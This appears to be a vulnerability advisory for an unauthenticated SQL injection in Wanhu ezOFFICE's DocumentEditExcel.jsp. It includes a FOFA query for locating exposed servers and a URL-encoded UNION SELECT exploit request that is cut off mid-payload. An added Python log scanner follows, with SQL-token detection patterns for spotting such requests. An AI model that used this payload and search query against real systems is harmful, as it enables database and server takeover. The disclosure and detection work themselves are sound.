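Product Overview
Wanhu OA is an OA (office automation) software product designed by Wanhu Network Technology Co., Ltd. It is a comprehensive collaborative office platform covering collaborative office work, information relationships, and various business systems.
Vulnerability Description
The DocumentEditExcel.jsp endpoint of Wanhu ezOFFICE has an SQL injection vulnerability. An unauthenticated attacker can exploit it to gain database privileges, and further exploitation can lead to server privileges.
FOFA
app="万户ezOFFICE协同管理平台"
Vulnerability Reproduction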
GET /defaultroot/public/iWebOfficeSign/DocumentEditExcel.jsp;?RecordID=%31%27%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%30%36%29%2b%43%48%41%52%28%31%30%36%29%2b%43%48%41%52%28%31%31%32%29%2b%43%48%41%52%28%31%31%33%29%2b%
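For defenders, the request above has three traits that can be matched in web access logs: the `;` path parameter appended to the JSP name, SQL syntax in `RecordID` once it is URL-decoded, and percent-encoding of plain letters and digits. The following is an added example, not part of the original page; the combined log format, the constructed sample lines and the token list are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint named on the page, lower-cased for a conservative comparison.
TARGET = "/defaultroot/public/iwebofficesign/documenteditexcel.jsp"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# SQL metacharacters and keywords that should not appear in a record identifier.
SQL_TOKENS = re.compile(r"'|--|/\*|\b(?:union|select|char|waitfor|exec)\b", re.I)
# Percent-encoded letters or digits: ordinary clients never encode these.
ENCODED_ALNUM = re.compile(r"%(?:3[0-9]|[46][1-9a-f]|[57][0-9a])", re.I)

# Constructed access-log lines (combined log format), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /defaultroot/public/iWebOfficeSign/'
    'DocumentEditExcel.jsp;?RecordID=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%4e%55%4c%4c'
    ' HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /defaultroot/public/iWebOfficeSign/'
    'DocumentEditExcel.jsp?RecordID=1024 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /defaultroot/login.jsp?x=%27 HTTP/1.1" 200 900',
]

def normalise_path(path):
    """Decode each segment and drop ';...' path parameters, as a servlet container would."""
    return "/".join(unquote(s).split(";", 1)[0] for s in path.split("/")).lower()

def inspect(line):
    """Return the list of suspicious traits for one log line ([] if none)."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if normalise_path(url.path) != TARGET:
        return []
    findings = []
    if ";" in unquote(url.path):
        findings.append("path-parameter")
    values = parse_qs(url.query, keep_blank_values=True).get("RecordID", [])
    if any(SQL_TOKENS.search(v) for v in values):
        findings.append("sql-token")
    if ENCODED_ALNUM.search(url.query):
        findings.append("encoded-alphanumerics")
    return findings

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry), entry.split('"')[1][:70])
```

Matching on the normalised path matters: a rule keyed to the literal string `DocumentEditExcel.jsp?` misses the `.jsp;?` form used in the request above.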